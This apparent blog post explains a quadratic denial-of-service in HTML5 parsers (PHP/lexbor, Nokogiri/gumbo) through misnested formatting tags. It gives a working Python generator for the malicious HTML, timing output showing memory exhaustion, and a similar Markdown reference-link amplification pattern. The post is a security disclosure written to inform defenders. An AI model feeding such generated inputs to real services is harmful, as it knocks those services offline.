Parsing HTML5 is more dangerous than you think
When parsing files in any kind of format, most people assume that a parser behaves linearly in the size of the file being read. In other words, if parsing a 1 MB file takes 10 milliseconds, you'd expect a 1 GB file to be parsed in roughly 10 seconds. Unfortunately, this assumption is sometimes wrong. A well-known example is the “billion laughs” attack against XML. This involves XML entities which are essentially macros. Expanding macros can trivially lead to super-linear behavior, in case of billion laughs even to exponential behavior.
In this article, I want to point out that HTML5 has similar problems. HTML5 is a complex specification, mostly because it tries to handle broken HTML in a sensible way. A typical example are misnested tags:
<b>one <i>two</b> three</i>
Here we encounter a start tag <i> followed by an end tag </b>
that doesn't match. If you parse this snippet, an HTML5 parser will
transform it into a parse tree matching
<b>one <i>two</i></b><i> three</i>
This behavior makes total sense and can be verified by evaluating the following Javascript expression in your browser:
new DOMParser().parseFromString(
'<b>one <i>two</b> three</i>',
'text/html'
).documentElement.outerHTML
To handle the misnested </b> end tag, the HTML5 spec essentially
mandates to close the <i> tag as well, and reconstruct the active
formatting elements
afterwards. This can be abused to cause quadratic behavior in every
conforming HTML5 parser. Consider the following HTML:
<b class="x"><b class="y"><b class="z">
<i class="x"><i class="y"><i class="z">
x</b>x</b>x</b>
After each misnested </b> end tag, the parser has to close and
reopen all the <i> tags. So if you repeat the <b> and <i> tags
N times, you end up with N² tags overall. Here's a simple Python
script that generates such malicious HTML:
import sys
n = int(sys.argv[1])
for i in range(n):
print(f'<b {i}>', end='')
for i in range(n):
print(f'<i {i}>', end='')
for i in range(n):
print('x</b>', end='')
The start tags must differ in their attributes, otherwise the somewhat weird Noah's Ark clause makes the parser ignore open formatting elements. Running the script above with sizes 1,000, 10,000 and 100,000 results in file sizes of roughly 20, 200 and 2,000 KB. Opening the first file should, in theory, result in 1,000² or one million HTML elements being created. The second file creates 100 million and the third one 10 billion elements. Larger inputs will result in trillions of elements, assuming a machine with unlimited resources.
So what happens if you open such files in a web browser? It obviously depends, but on macOS Safari the largest file will cause a CPU core to run at full capacity for minutes, increase memory usage by a couple of GB until (at a guess) the browser runs into an internal limit and will stop further processing.
All of this might look like a security issue, but at least in the context of modern web browsers it isn't. After all, these marvelous pieces of engineering allow to run untrusted Javascript code which makes it trivial to consume an excessive amount of resources by other means. Everything is sandboxed and the browser can simply abort if too much memory or CPU is used.
But how do offline parsers handle such files? Let's try some popular “scripting” languages and the underlying C libraries. Historically, many of these languages offered modules that used libxml2 to parse HTML under the hood, but libxml2 doesn't support HTML5. Luckily, other options are available these days.
Let's start with PHP which, as of version 8.4, supports parsing HTML5 using the lexbor library. With the test cases above, you'll quickly exceed PHP's default memory limit, so let's disable that:
<?php
ini_set("memory_limit", "-1");
$doc = Dom\HTMLDocument::createFromFile(
$argv[1],
LIBXML_NOERROR
);
The first file with 1,000 tags already takes 0.3 seconds to parse:
$ time php parse.php html5-dos-1000.html
real 0m0.382s
user 0m0.279s
sys 0m0.102s
Since we're dealing with quadratic behavior, we'd expect the second file with 10x the number of tags to take at least 100x more time. But on my machine with 32 GB of RAM, it takes several minutes, consuming all available memory until the process is terminated by the Linux OOM killer:
$ time php parse.php html5-dos-10000.html
Killed php parse.php html5-dos-10000.html
real 9m58.125s
user 9m43.038s
sys 0m8.649s
Note that, as mentioned above, this is just a ~200KB file. In conclusion, it's trivial to exhaust all available memory when letting PHP parse untrusted HTML5.
Now let's have a look at the Nokogiri Ruby gem which supports HTML5 via the gumbo library for quite a while.
require 'nokogiri'
doc = Nokogiri::HTML5(File.open(ARGV[0]))
$ ruby parse.rb html5-dos-1000.html
/usr/lib/ruby/gems/3.4.0/gems/nokogiri-1.18.9/lib/nokogiri/html5/document.rb:153:in 'Nokogiri::Gumbo.parse': Document tree depth limit exceeded (ArgumentError)
That's a lot better. Limiting the depth of the document tree is a good way to avoid resource exhaustion caused by such issues and it's unlikely that users raise this limit manually. If we raise the maximum depth to one million, we get results similar to PHP:
require 'nokogiri'
doc = Nokogiri::HTML5(
File.open(ARGV[0]),
max_tree_depth: 1000000
)
$ time ruby parse.rb html5-dos-1000.html
real 0m0.995s
user 0m0.834s
sys 0m0.160s
$ time ruby parse.rb html5-dos-10000.html
Killed ruby parse.rb html5-dos-10000.html
real 1m42.733s
user 1m37.020s
sys 0m5.588s
As far as I'm aware, lexbor and gumbo are the only options if you're looking for a C library to parse HTML5 and I'd expect other language bindings to these libraries to behave similarly. Unfortunately, lexbor doesn't have an option to guard against malicious HTML5, but it seems to me that such protection would be useful.
Other file formats
I already mentioned the billion laughs attack against XML, but there's another part of the spec that makes XML parsing quadratic by design. While I mitigated the issue in libxml2, the popular Expat library is still vulnerable and I don't want to disclose the details until the defect is fixed.
Markdown also suffers from a quadratic-by-design issue when handling reference links. Consider the following Markdown input:
[link]
[link]
[link]
[link]
...
[link]: /an-extremely-long-link/an-extremely-long-link/...
You can simply create an extremely long link and cause the parser to insert the link over and over again with a link label of just a few bytes. In essence, this is just another example of macro-like expansion. I mitigated the issue in libcmark, the reference CommonMark implementation, in 2020.